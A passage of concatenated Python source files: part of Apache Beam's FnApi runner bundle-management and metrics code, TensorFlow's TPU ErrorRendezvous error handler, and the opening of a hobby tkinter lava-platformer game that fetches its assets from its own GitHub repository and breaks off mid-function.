read_transform_id, buffer_data = only_element(inputs.items())
byte_stream = b''.join(buffer_data)
num_elements = len(
list(
self._get_input_coder_impl(read_transform_id).decode_all(
byte_stream)))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
self._send_input_to_worker(
process_bundle_id, read_transform_id, [byte_stream])
assert self._worker_handler is not None
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_id=process_bundle_id,
desired_splits={
read_transform_id: beam_fn_api_pb2.
ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._worker_handler.control_conn.push(
split_request).get() # type: beam_fn_api_pb2.InstructionResponse
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._worker_handler.control_conn.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
return split_results
def process_bundle(self,
inputs, # type: Mapping[str, PartitionableBuffer]
expected_outputs # type: DataOutput
):
# type: (...) -> BundleProcessResult
# Unique id for the instruction processing this bundle.
with BundleManager._lock:
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
self._worker_handler = self._worker_handler_list[
BundleManager._uid_counter % len(self._worker_handler_list)]
# Register the bundle descriptor, if needed - noop if already registered.
registration_future = self._register_bundle_descriptor()
# Check that the bundle was successfully registered.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
split_manager = self._select_split_manager()
if not split_manager:
# If there is no split_manager, write all input data to the channel.
for transform_id, elements in inputs.items():
self._send_input_to_worker(process_bundle_id, transform_id, elements)
# Actually start the bundle.
process_bundle_req = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_id=self._bundle_descriptor.id,
cache_tokens=[next(self._cache_token_generator)]))
result_future = self._worker_handler.control_conn.push(process_bundle_req)
split_results = [] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse]
with ProgressRequester(self._worker_handler,
process_bundle_id,
self._progress_frequency):
if split_manager:
split_results = self._generate_splits_for_testing(
split_manager, inputs, process_bundle_id)
# Gather all output data.
for output in self._worker_handler.data_conn.input_elements(
process_bundle_id,
expected_outputs.keys(),
abort_callback=lambda:
(result_future.is_done() and result_future.get().error)):
if output.transform_id in expected_outputs:
with BundleManager._lock:
self._get_buffer(expected_outputs[output.transform_id]).append(
output.data)
_LOGGER.debug('Wait for the bundle %s to finish.' % process_bundle_id)
result = result_future.get() # type: beam_fn_api_pb2.InstructionResponse
if result.error:
raise RuntimeError(result.error)
if result.process_bundle.requires_finalization:
finalize_request = beam_fn_api_pb2.InstructionRequest(
finalize_bundle=beam_fn_api_pb2.FinalizeBundleRequest(
instruction_id=process_bundle_id))
self._worker_handler.control_conn.push(finalize_request)
return result, split_results
class ParallelBundleManager(BundleManager):
def __init__(
self,
worker_handler_list, # type: Sequence[WorkerHandler]
get_buffer, # type: Callable[[bytes], PartitionableBuffer]
get_input_coder_impl, # type: Callable[[str], CoderImpl]
bundle_descriptor, # type: beam_fn_api_pb2.ProcessBundleDescriptor
progress_frequency=None,
skip_registration=False,
cache_token_generator=None,
**kwargs):
# type: (...) -> None
super(ParallelBundleManager, self).__init__(
worker_handler_list,
get_buffer,
get_input_coder_impl,
bundle_descriptor,
progress_frequency,
skip_registration,
cache_token_generator=cache_token_generator)
self._num_workers = kwargs.pop('num_workers', 1)
def process_bundle(self,
inputs, # type: Mapping[str, PartitionableBuffer]
expected_outputs # type: DataOutput
):
# type: (...) -> BundleProcessResult
part_inputs = [{} for _ in range(self._num_workers)
] # type: List[Dict[str, List[bytes]]]
for name, input in inputs.items():
for ix, part in enumerate(input.partition(self._num_workers)):
part_inputs[ix][name] = part
merged_result = None # type: Optional[beam_fn_api_pb2.InstructionResponse]
split_result_list = [
] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse]
def execute(part_map):
# type: (...) -> BundleProcessResult
bundle_manager = BundleManager(
self._worker_handler_list,
self._get_buffer,
self._get_input_coder_impl,
self._bundle_descriptor,
self._progress_frequency,
self._registered,
cache_token_generator=self._cache_token_generator)
return bundle_manager.process_bundle(part_map, expected_outputs)
with UnboundedThreadPoolExecutor() as executor:
for result, split_result in executor.map(execute, part_inputs):
split_result_list += split_result
if merged_result is None:
merged_result = result
else:
merged_result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
merged_result.process_bundle.monitoring_infos))),
error=result.error or merged_result.error)
assert merged_result is not None
return merged_result, split_result_list
class ProgressRequester(threading.Thread):
""" Thread that asks SDK Worker for progress reports with a certain frequency.
A callback can be passed to call with progress updates.
"""
def __init__(self,
worker_handler, # type: WorkerHandler
instruction_id,
frequency,
callback=None
):
# type: (...) -> None
super(ProgressRequester, self).__init__()
self._worker_handler = worker_handler
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._worker_handler.control_conn.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=beam_fn_api_pb2.
ProcessBundleProgressRequest(
instruction_id=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
_LOGGER.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
user_metrics_only: If true, includes user metrics only.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._monitoring_infos = step_monitoring_infos
for smi in step_monitoring_infos.values():
counters, distributions, gauges = \
portable_metrics.from_monitoring_infos(smi, user_metrics_only)
self._counters.update(counters)
self._distributions.update(distributions)
self._gauges.update(gauges)
def query(self, filter=None):
counters = [
MetricResult(k, v, v) for k,
v in self._counters.items() if self.matches(filter, k)
]
distributions = [
MetricResult(k, v, v) for k,
v in self._distributions.items() if self.matches(filter, k)
]
gauges = [
MetricResult(k, v, v) for k,
v in self._gauges.items() if self.matches(filter, k)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
def monitoring_infos(self):
# type: () -> List[metrics_pb2.MonitoringInfo]
return [
item for sublist in self._monitoring_infos.values() for item in sublist
]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable object including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
|
error_handling.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""ErrorRendezvous handler for collecting errors from multiple threads."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import threading
import time
import traceback
from tensorflow.python.framework import errors
from tensorflow.python.platform import tf_logging as logging
_UNINTERESTING_ERRORS = (errors.CancelledError,)
class ErrorRendezvous(object):
"""Resolve errors from multiple threads during TPU execution.
TPU errors can occur on the infeed or outfeed threads as well as the main
training thread.
Depending on which thread "wins" and receives the session error first, we may
end up showing users a confusing and non-actionable error message (session
cancelled) instead of a root cause (e.g. a bad filename).
The rendezvous object provides a location to capture these errors until all
threads terminate. At that point we can choose the most informative error
to report.
"""
def __init__(self, num_sources):
# string -> (message, traceback)
self._errors = {}
self._num_sources = num_sources
self._session_cancel_timer = None
def record_error(self, source, exception, session=None):
"""Report an exception from the given source.
If a session is passed, a timer will be registered to close it after a few
seconds. This is necessary to ensure the main training loop does not hang
if an infeed/oufeed error occurs. We sleep a few seconds to allow a more
interesting error from another thread to propagate.
Args:
source: string, source of the error
exception: Exception being thrown
session: Session to close after delay.
"""
logging.info('Error recorded from %s: %s', source, exception)
stack_trace = traceback.format_exc()
self._errors[source] = (exception, stack_trace)
if session is not None and self._session_cancel_timer is None:
def _cancel_session():
time.sleep(5)
try:
session.close()
except: # pylint: disable=bare-except
pass
self._session_cancel_timer = threading.Thread(target=_cancel_session,)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def record_done(self, source):
"""Mark execution source `source` as done.
If an error was originally reported from `source` it is left intact.
Args:
source: `str`, source being recorded
"""
logging.info('%s marked as finished', source)
if source not in self._errors:
self._errors[source] = None
@contextlib.contextmanager
def catch_errors(self, source, session=None):
"""Context manager to report any errors within a block."""
try:
yield
except Exception as e: # pylint: disable=broad-except
self.record_error(source, e, session)
def raise_errors(self, timeout_sec=5):
"""Wait for up to `timeout` seconds for all error sources to finish.
Preferentially raise "interesting" errors (errors not in the
_UNINTERESTING_ERRORS) set.
Args:
timeout_sec: Seconds to wait for other error sources.
"""
for _ in range(timeout_sec):
if len(self._errors) == self._num_sources:
break
time.sleep(1)
kept_errors = [(k, v) for (k, v) in self._errors.items() if v is not None]
if not kept_errors:
return
# First check for any interesting errors, then fall back on the session
# cancelled errors etc.
for k, (exc, _) in kept_errors:
if isinstance(exc, _UNINTERESTING_ERRORS):
continue
else:
raise exc
for k, (exc, _) in kept_errors:
raise exc
|
lavaPlatformer.py
|
from tkinter import *
from tkinter import messagebox
import tkinter.simpledialog as s
import time, sys, random, os, sqlite3, json, threading, requests, shutil
import shop, statistics, settings
from soundplayer import SoundPlayer
filept = os.path.abspath(os.listdir()[0])
class Game:
def __init__(self, st=False, ktc=1):
self.ktc = ktc
self.version = 13.0
self.pathuser = filept.split('/ '[0])[2]
self.platform_number = 0
self.ff_time = False
self.golevels = []
print("Downloading image content...")
self.set_asset()
print("Done")
self.tk = Tk(className="lavaplatformer")
self.tk.title("lavaPlatformer start-up")
# self.tk.geometry("500x500+10+200")
x = Label(self.tk, text="Welcome on lavaPlatformer!")
x.pack()
self.p = PhotoImage(file="/home/{0}/.lavaPlatformer/Data/showupimage.gif".format(self.pathuser))
self.l = Label(self.tk, image=self.p)
self.l.pack()
self.name = s.askstring("Player name", "Enter player name:") if self.ff_time or st else None
control = self.check_name()
if not control and not os.path.exists("/home/{0}/.lavaPlatformer/user.txt".format(self.pathuser)):
messagebox.showerror("Error", "Invalid name, You can only use characters from a-z, A-Z, numbers and underscore. Your name can not exist two times")
shutil.rmtree("/home/{0}/.lavaPlatformer".format(self.pathuser))
sys.exit()
x.destroy()
self.l.destroy()
self.tk.resizable(0,0)
self.tk.protocol("WM_DELETE_WINDOW", lambda: self.gameover(closing=True))
self.tk.title("LavaPlatformer v{0}".format(self.version))
self.canvas = Canvas(self.tk, width=500, height=500, bg="lightblue")
self.canvas.pack()
self.platforms = [] #List of platforms
self.gameIsRunning = False
self.color = "black"
self.selected = self.color
self.coins = 0
self.diamonds = 0
self.keys = 0
self.lava_dist = 450.0
self.timetxt = self.canvas.create_text(0,0, anchor="nw", text="Time: {0}".format(round(0-0, 2)), font="Purisa 14 bold", fill="blue")
self.cointxt = self.canvas.create_text(0,35, anchor="nw", text="Coins: {0}".format(self.coins), font="Purisa 14 bold", fill="yellow")
self.lavadisttxt = self.canvas.create_text(500,0, anchor="ne", text="Lava Distance: {0}".format(self.lava_dist), font="Purisa 14 bold", fill="red")
self.diamondstxt = self.canvas.create_text(500,35, anchor="ne", text="Diamonds: {0}".format(self.diamonds), font="Purisa 14 bold", fill="purple")
self.keystxt = self.canvas.create_text(500, 70, anchor="ne", text="Keys: {0}".format(self.keys), font="Purisa 14 bold", fill="green")
self.shop = shop.Shop(self, pt="/home/{0}/.lavaPlatformer/".format(self.pathuser))
self.shop.show_button()
self.statistics_menu = statistics.Statistics(self)
self.statistics_menu.show_button()
self.statistics = {
"best_time" : 0,
"platforms_jumped" : 0,
"times_played" : 0,
"best_job_level" : 0,
"best_game_level" : 0,
"skins_owned" : 1
}
self.maxtime = 0.0
def filter_func(self, a):
if a == 0:
return True
else:
return False
def play_sound(self, soundpath, loop=False):
def play():
if loop:
while True:
if self.gameIsRunning:
s = SoundPlayer(soundpath, self)
s.play()
else:
s = SoundPlayer(soundpath, self)
s.play()
t = threading.Thread(target=play)
t.start()
def ask_sounds(self):
sounds = ["chest", "coin", "gameover", "level", "respawn", "start"]
if not os.path.isdir("/home/{0}/.lavaPlatformer/Data/Sounds".format(self.pathuser)):
os.mkdir("/home/{0}/.lavaPlatformer/Data/Sounds".format(self.pathuser))
for sound in sounds:
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Sounds/{0}.mp3".format(sound))
open("/home/{0}/.lavaPlatformer/Data/Sounds/{1}.mp3".format(self.pathuser, sound), "wb").write(r.content)
self.soundspath = "/home/{0}/.lavaPlatformer/Data/Sounds".format(self.pathuser)
def save_user(self):
if not os.path.exists("/home/{0}/.lavaPlatformer/user.txt".format(self.pathuser)):
with open("/home/{0}/.lavaPlatformer/user.txt".format(self.pathuser), "w") as f:
f.write(self.name)
else:
with open("/home/{0}/.lavaPlatformer/user.txt".format(self.pathuser)) as f:
self.name = f.read().rstrip("\n")
def check_name(self):
try:
if self.name in os.listdir("/home/{0}/.lavaPlatformer".format(self.pathuser)):
return False
except:
pass
if self.name == "" or self.name == None or len(self.name) > 15:
return False
l = list(self.name)
words = "abcdefghijklmnopqrstuvwxyz0123456789_"
for ch in l:
if not ch in list(words)+list(words.upper()):
return False
return True
def at_start(self):
def start(e):
self.play_sound("{0}/start.mp3".format(self.soundspath))
self.canvas.delete(txt)
self.canvas.delete(self.shop.id)
self.canvas.delete(self.statistics_menu.id)
self.canvas.delete(self.settings_button.id)
self.shop.job_button.jobs[0]["Jump on platforms"]["progress"] = 0
self.shop.job_button.jobs[1]["Go on transparent platforms"]["progress"] = 0
self.shop.job_button.jobs[2]["Get coins"]["progress"] = 0
self.gameIsRunning = True
self.time1 = round(time.time(), 2)
self.time2 = round(time.time(), 2)
tap_to_start = '''
TAP TO
START
'''
txt = self.canvas.create_text(-100, 250, anchor="center", text=tap_to_start, font="Calibri 45 bold", fill="gray")
self.canvas.tag_bind(txt, "<Button-1>", start)
def load_json_statistics(self, save=False):
if os.path.exists("statistics.json") and not save:
with open("statistics.json", "r") as f:
data = json.load(f)
#print(data)
self.statistics = data
else:
with open("statistics.json", "w") as f:
json.dump(self.statistics, f, indent=4)
if save:
self.statistics["times_played"] += 1
os.chdir(os.path.abspath(filept+"/.."))
os.chdir("/home/{0}/.lavaPlatformer/{1}".format(self.pathuser, self.name))
with open("statistics.json", "w") as f:
json.dump(self.statistics, f, indent=4)
def save_json_data(self, val=None, ff=False, load=False):
if load:
with open("colors.json", "r") as colors_f:
data = json.load(colors_f)
self.selected = data["selected"]
self.from_json = data
# print("Main:", self.selected)
return
if os.path.exists("colors.json") and ff:
with open("colors.json", "r") as colors_f:
data = json.load(colors_f)
self.from_json = data
self.color = data["colors"][data["colors"].index(self.color)]
else:
os.chdir(os.path.abspath(filept+"/.."))
os.chdir("/home/{0}/.lavaPlatformer/{1}".format(self.pathuser, self.name))
with open("colors.json", "w") as colors_f:
data = {
"colors" : val,
"selected" : self.selected
}
self.from_json = data
json.dump(data, colors_f, indent=4)
def set_asset(self):
user = self.pathuser
path = ""#.format(user)
#os.chdir(path)
if not os.path.isdir("/home/{0}/.lavaPlatformer".format(user)):
os.mkdir("/home/{0}/.lavaPlatformer".format(user))
self.ff_time = True
if not os.path.isdir("/home/{0}/.lavaPlatformer/Data".format(user)):
os.mkdir("/home/{0}/.lavaPlatformer/Data".format(user))
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/showupimage.gif", allow_redirects=True)
open("/home/{0}/.lavaPlatformer/Data/showupimage.gif".format(user), "wb").write(r.content)
# os.system("cp "+"Data/showupimage.gif "+" /home/{0}/.lavaPlatformer/Data/showupimage.gif".format(user))
if not os.path.isdir("/home/{0}/.lavaPlatformer/Data/Images".format(user)):
os.mkdir("/home/{0}/.lavaPlatformer/Data/Images".format(user))
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Images/chest.gif")
open("/home/{0}/.lavaPlatformer/Data/Images/chest.gif".format(user), "wb").write(r.content)
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Images/jobs.gif")
open("/home/{0}/.lavaPlatformer/Data/Images/jobs.gif".format(user), "wb").write(r.content)
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Images/settings.gif")
open("/home/{0}/.lavaPlatformer/Data/Images/settings.gif".format(user), "wb").write(r.content)
r = requests.get("https://github.com/OrangoMango/LavaPlatformer/raw/master/Data/Images/shop.gif")
open("/home/{0}/.lavaPlatformer/Data/Images/shop.gif".format(user), "wb").write(r.content)
def setup_directory(self):
user = self.pathuser
path = ""#.format(user)
#os.chdir(path)
self.save_user()
if not os.path.exists(path+"/home/{0}/.lavaPlatformer/".format(user)+self.name):
os.mkdir(path+"/home/{0}/.lavaPlatformer/".format(user)+self.name)
print("Downloading sounds...")
self.ask_sounds()
print("Done")
self.path4job = path+"/home/{0}/.lavaPlatformer/{1}/".format(user, self.name)
os.chdir(path+"/home/{0}/.lavaPlatformer/{1}/".format(user, self.name))
if not os.path.exists("../path.txt"):
with open("../path.txt", "w") as f:
f.write(self.soundspath)
else:
with open("../path.txt", "r") as f:
self.soundspath = f.read().rstrip("\n")
var = False
if os.path.exists("data.db"):
var = True
connection = sqlite3.connect("data.db")
cursor = connection.cursor()
sql = "SELECT * FROM data"
cursor.execute(sql)
for d in cursor:
self.coins = int(d[0])
self.diamonds = int(d[1])
self.keys = int(d[2])
self.canvas.itemconfig(self.cointxt, text="Coins: {0}".format(self.coins))
self.canvas.itemconfig(self.diamondstxt, text="Diamonds: {0}".format(self.diamonds))
self.canvas.itemconfig(self.keystxt, text="Keys: {0}".format(self.keys))
connection.close()
os.remove("data.db")
# print("OK")
self.connection = sqlite3.connect("data.db")
self.cursor = self.connection.cursor()
sql = "CREATE TABLE data(coins INTEGER, diamonds INTEGER, keys INTEGER)"
self.cursor.execute(sql)
if not var:
#print("Here")
self.save_json_data(val=[self.color], ff=True)
else:
self.save_json_data(load=True)
self.load_json_statistics()
self.shop.add_job()
self.settings_button = settings.Settings(self)
self.settings_button.show_button()
# self.connection.close()
def mainloop(self):
self.time1 = time.time()
self.time2 = time.time()
ok = True
while True:
if self.gameIsRunning:
try:
self.time2 = time.time()
self.canvas.itemconfig(self.timetxt, text="Time: {0}".format(round(self.time2-self.time1, 2)))
self.canvas.itemconfig(self.cointxt, text="Coins: {0}".format(self.coins))
self.canvas.itemconfig(self.lavadisttxt, text="Lava Distance: {0}".format(self.lava_dist))
self.canvas.itemconfig(self.diamondstxt, text="Diamonds: {0}".format(self.diamonds))
self.canvas.itemconfig(self.keystxt, text="Keys: {0}".format(self.keys))
self.canvas.tag_raise(self.timetxt)
self.canvas.tag_raise(self.cointxt)
self.canvas.tag_raise(self.lavadisttxt)
self.canvas.tag_raise(self.diamondstxt)
self.canvas.tag_raise(self.keystxt)
l.draw()
p.draw()
self.tk.update()
except:
break
time.sleep(0.01)
else:
if ok:
self.maxtime = round(self.time2-self.time1, 2)
ok = False
try:
self.tk.update()
except:
break
time.sleep(0.01)
def gameover(self, errortype="Game Over", closing=False):
ktc = self.ktc
self.play_sound("{0}/gameover.mp3".format(self.soundspath))
if not closing:
messagebox.showerror("Game Over", errortype)
if errortype == "Lava touched you!" or errortype == "You hit the floor too hard":
ask = messagebox.askyesno("Respawn", "Do you want to use %s keys to continue?" % ktc)
if ask:
if self.keys < ktc:
messagebox.showerror("Error", "You don't have enough keys")
ktc = 1
self.ktc = ktc
else:
self.keys -= ktc
self.play_sound("{0}/respawn.mp3".format(self.soundspath))
ktc += 1
self.ktc = ktc
self.canvas.itemconfig(self.keystxt, text="Keys: {0}".format(self.keys))
p.damage = 0
if errortype == "Lava touched you!":
self.canvas.move(l.id, 0, -350)
return
else:
ktc = 1
self.ktc = ktc
else:
ktc = 1
self.ktc = ktc
#print(p.damage)
self.maxtime = round(self.time2-self.time1, 2)
sql = "INSERT INTO data VALUES(?, ?, ?)"
self.cursor.execute(sql, (self.coins, self.diamonds, self.keys))
self.connection.commit()
self.connection.close()
self.save_json_data(val=self.from_json["colors"]+[self.color] if not self.color in self.from_json["colors"] else self.from_json["colors"])
if self.statistics['best_time'] < self.maxtime:
self.statistics['best_time'] = self.maxtime
self.load_json_statistics(True)
self.shop.job_button.save_progress()
try:
self.tk.destroy()
except:
pass
self.gameIsRunning = False
if not closing:
main(ktc=ktc, st = True if errortype=="Game must be restarted after creating" else False)
else:
sys.exit(0)
class Profile:
def __init__(self, game):
self.game = game
self.tk = Tk()
self.tk.title("Profiles")
self.profiles = self.get_profiles()
self.var = StringVar(master=self.tk)
#self.var.set("Orango")
self.var.set(self.getCurrentUser())
self.rdb = []
self.profiles_frame = LabelFrame(self.tk, text="Profiles")
self.profiles_frame.pack()
def show_interface(self):
for prf in self.profiles:
r = Radiobutton(self.profiles_frame, text=prf, variable=self.var, value=prf)
r.pack()
self.rdb.append(r)
self.ok = Button(self.tk, text="SELECT", command=self.select)
self.ok.pack()
self.new = Button(self.tk, text="CREATE", command=self.create)
self.new.pack()
self.dele = Button(self.tk, text="DELETE", command=self.delete)
self.dele.pack()
def delete(self):
s = self.var.get()
if s == self.getCurrentUser():
messagebox.showerror("Error", "Could not delete current profile", master=self.tk)
return
for i in os.listdir(self.game.path4job+"../{0}/".format(s)):
os.remove(self.game.path4job+"../{0}/".format(s)+i)
os.rmdir(self.game.path4job+"../{0}".format(s))
# self.game.gameover(closing=True)
messagebox.showinfo("Info", "Profile deleted", master=self.tk)
self.tk.destroy()
def create(self):
os.remove(self.game.path4job+"../user.txt")
self.tk.destroy()
self.game.gameover(errortype="Game must be restarted after creating")
def getCurrentUser(self):
with open(self.game.path4job+"../user.txt", "r") as f:
return f.read()
def select(self):
s = self.var.get()
with open(self.game.path4job+"../user.txt", "w") as f:
f.write(s)
messagebox.showinfo("Info", "User {0} selected".format(s), master=self.tk)
self.tk.destroy()
self.game.gameover(errortype="Game must be restarted")
def get_profiles(self):
data = []
# print(os.listdir(self.game.path4job+"../"))
os.chdir(os.path.abspath(filept+"/../"))
for i in os.listdir(self.game.path4job+"../"):
if not i.endswith(".txt") and not i == "Data":
data.append(i)
return data
class Player:
def __init__(self, game, lava):
self.lava = lava
self.on_platform_OS = "computer" #TO SET TO COMPUTER
self.game = game
self.id_x = self.game.canvas.create_rectangle(40, 115, 75, 150, fill=self.game.selected, tags="Player")
self.name = self.game.canvas.create_text(58, 100, anchor="center", text=self.game.name, tags="Player")
self.id = "Player"
self.game.tk.bind("<KeyPress>" if self.on_platform_OS == "computer" else "<Motion>", self.move)
self.x, self.y = 0, 0
self.damage = 0
self.level = 1
self.game.canvas.tag_bind(self.id, "<Button-1>", self.switch)
def switch(self, event):
if self.game.gameIsRunning == False:
#tk = Toplevel(self.game.tk)
prf = Profile(self.game)
prf.show_interface()
def move(self, event):
if not self.game.gameIsRunning:
return
if self.on_platform_OS == "android":
x, y = event.x, event.y
k = None
elif self.on_platform_OS == "computer":
k = event.char
x, y = 0, 0
#print(k)
pos = self.game.canvas.coords(self.id)
if ((x >= 250 and self.on_platform_OS == "android") or (k == "d" and self.on_platform_OS == "computer")) and pos[2] <= 500:
self.game.canvas.move(self.id, 13 if self.on_platform_OS == "computer" else 5, 0)
elif ((x < 250 and self.on_platform_OS == "android") or (k == "a" and self.on_platform_OS == "computer")) and pos[0] >= 0:
self.game.canvas.move(self.id, -13 if self.on_platform_OS == "computer" else -5, 0)
def draw(self):
self.game.canvas.move(self.id, self.x, self.y)
x = 0
# print("length", len(self.game.platforms))
for platform in self.game.platforms:
# print(platform.last, x)
pl_pos = self.game.canvas.coords(platform.id)
pos = self.game.canvas.coords(self.id)
if self.damage >= 80:
self.game.gameover(errortype="You fell into the void")
if (((pos[3] >= pl_pos[1] and pos[3] <= pl_pos[3]) \
and (pos[2] >= pl_pos[0] and pos[2] <= pl_pos[2]+15)) \
or ((pos[0] >= pl_pos[0] and pos[0] <= pl_pos[2]) and (pos[3] >= pl_pos[1] and pos[3] <= pl_pos[3]))):
if platform.type == "death":
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["progress"] += 0.5
if self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["progress"] == self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["number"]:
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["number"] += 2
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["reward"] += 5
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["level"] += 1
self.game.diamonds += self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["reward"] - 5
self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["progress"] = 0
self.game.play_sound("{0}/level.mp3".format(self.game.soundspath))
if self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["level"] > self.game.statistics["best_job_level"]:
self.game.statistics["best_job_level"] = self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["level"]
if self.game.settings_button.dict["popups"]["value"] == 1 and self.game.settings_button.dict["popups"]["jobs"] == 1:
messagebox.showinfo("Info", "You passed next job level in \"Go on transparent platforms\" reward is {0} diamonds".format(self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["reward"]-5)) #HERE
self.game.canvas.move(platform.id, 0, -10)
self.lava.fall = False
platform.touched = True
continue
if self.damage >= 25:
self.game.gameover(errortype="You hit the floor too hard")
else:
self.damage = 0
# print(platform.id_number)
self.lava.fall = True
if not platform.touched:
self.game.golevels.append(platform.id_number % 10)
self.game.golevels = list(filter(self.game.filter_func, self.game.golevels))
try:
if int(platform.id_number / 10) >= self.level and self.game.gameIsRunning: #len(self.game.golevels) == self.level:
self.level += 1
if self.level-1 > self.game.statistics["best_game_level"]:
self.game.statistics['best_game_level'] = self.level-1
if self.game.settings_button.dict["popups"]["value"] == 1 and self.game.settings_button.dict["popups"]["levels"] == 1:
messagebox.showinfo("lavaPlatformer", "You passed level {0}".format(self.level-1)) #HERE
except Exception as e:
print("Error", e)
# print(self.game.golevels)
self.game.statistics["platforms_jumped"] += 1
self.game.shop.job_button.jobs[0]["Jump on platforms"]["progress"] += 1
if self.game.shop.job_button.jobs[0]["Jump on platforms"]["progress"] == self.game.shop.job_button.jobs[0]["Jump on platforms"]["number"]:
self.game.shop.job_button.jobs[0]["Jump on platforms"]["number"] += 5
self.game.shop.job_button.jobs[0]["Jump on platforms"]["reward"] += 4
self.game.shop.job_button.jobs[0]["Jump on platforms"]["level"] += 1
self.game.diamonds += self.game.shop.job_button.jobs[0]["Jump on platforms"]["reward"] - 4
self.game.shop.job_button.jobs[0]["Jump on platforms"]["progress"] = 0
self.game.play_sound("{0}/level.mp3".format(self.game.soundspath))
if self.game.shop.job_button.jobs[0]["Jump on platforms"]["level"] > self.game.statistics["best_job_level"]:
self.game.statistics["best_job_level"] = self.game.shop.job_button.jobs[0]["Jump on platforms"]["level"]
if self.game.settings_button.dict["popups"]["value"] == 1 and self.game.settings_button.dict["popups"]["jobs"] == 1:
messagebox.showinfo("Info", "You passed next job level in \"Jump on platforms\" reward is {0} diamonds".format(self.game.shop.job_button.jobs[0]["Jump on platforms"]["reward"]-4)) #HERE
for x in range(2):
if platform.next:
last = None
for plat in self.game.platforms:
if plat.last:
last = plat
plat.last = False
break
c_p_pos = self.game.canvas.coords(last.id)
nx, ny, nx1, ny1 = c_p_pos
def check(v1, v2):
if v1 <= 0:
#print("IN")
return 200, 400
elif v2 >= 500:
#print("Out")
return 0,300
else:
return v1, v2
val1, val2 = check(nx-80, nx1+80)
x3 = random.randint(val1, val2)
n = random.random()
if n > 0.6:
x = "coin"
else:
x = "normal"
if len(self.game.platforms) > 17: #Next difficulty level
dt = random.random()
if x == "coin":
x = "coin"
